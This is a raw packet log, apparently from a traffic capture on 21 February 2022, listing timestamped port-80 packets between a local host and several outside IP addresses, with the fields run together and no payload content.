                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493195057 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493242979 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493357897 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493410110 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493463993 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493649006 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.585652113 CET8049846185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594285011 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594331980 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594508886 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594599962 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596323967 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596400023 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596477032 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596520901 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596560001 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596564054 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596610069 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596759081 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596940994 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.597016096 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.597196102 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696571112 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696644068 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696693897 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696731091 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696783066 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696888924 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696957111 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.696999073 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698276997 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698340893 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698542118 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698554039 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698605061 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698652983 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698729992 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698781967 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698815107 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698879004 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698954105 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698987961 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699011087 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699055910 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699090004 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699192047 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699285984 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699480057 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700242996 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700293064 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700352907 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700396061 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700428009 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700460911 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700469017 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700505972 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700541973 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700737000 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798731089 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798799038 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798832893 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.799258947 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800573111 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800869942 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800939083 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800993919 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071219921 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071393967 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071582079 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071583033 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071645975 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071697950 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071753025 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071789026 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071851969 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071932077 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071930885 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072050095 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072089911 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072105885 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072122097 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072153091 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072182894 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072212934 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072236061 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072257042 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072309017 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072362900 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072412014 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072417974 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072592020 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072763920 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080430031 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080626965 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080672026 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080689907 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080802917 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080988884 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083134890 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083484888 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083612919 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.088574886 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.088723898 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.093614101 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.098767042 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.103653908 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.197734118 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.197798967 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.198025942 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.198087931 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.205997944 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206063986 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206460953 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206557989 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.216734886 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.215698004 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.381295919 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.381834984 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386236906 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386334896 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386518002 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552160978 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552246094 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552289009 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552325010 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552359104 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552423000 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552561045 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552639008 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552833080 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553036928 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553215981 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.556869030 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.557152033 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.557224989 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718252897 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718306065 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718338013 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718436956 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718512058 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718641996 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718825102 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718839884 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718907118 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718993902 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719038010 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719177008 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719276905 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719355106 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719423056 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719698906 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719882965 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.727010965 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884265900 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884336948 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884370089 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884536028 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884614944 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884691000 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884854078 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884885073 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884974003 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119992971 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120023966 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120156050 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120204926 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120223045 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120238066 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120273113 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120321989 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120353937 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120383024 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120395899 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120524883 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120532990 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120559931 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120738983 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129069090 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129154921 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129208088 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129241943 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129318953 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129447937 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129491091 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130511045 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130580902 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130724907 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130861998 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130959988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131019115 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131110907 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131149054 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131165028 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131180048 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131211042 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131211996 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131243944 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131300926 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131335020 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131365061 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131441116 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131690025 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131717920 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131795883 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131834030 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131865025 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131908894 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131985903 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131990910 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132097006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132157087 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132167101 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132204056 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132237911 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132246017 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132468939 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132644892 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132771015 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139678001 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139744997 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139781952 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139827013 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139925003 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139928102 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140058994 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140100956 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140281916 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141565084 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141623974 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141705990 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141947031 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142004013 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142224073 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142330885 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142426968 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142540932 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142582893 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142605066 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142731905 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142769098 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142827988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142833948 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142863035 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142920017 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142951012 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142981052 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143009901 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143013954 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143186092 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143203974 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143244982 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143306017 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143337011 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143414021 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143449068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143482924 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143543959 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143594980 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887728930 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887780905 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887833118 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887897015 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887955904 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887999058 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888061047 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888139963 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888185978 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:35.995588064 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095063925 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095292091 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095345974 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.195632935 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.603353977 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622030020 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622102976 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622350931 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622414112 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.703087091 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.703320026 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.618428946 CET4987080192.168.11.2034.102.136.180
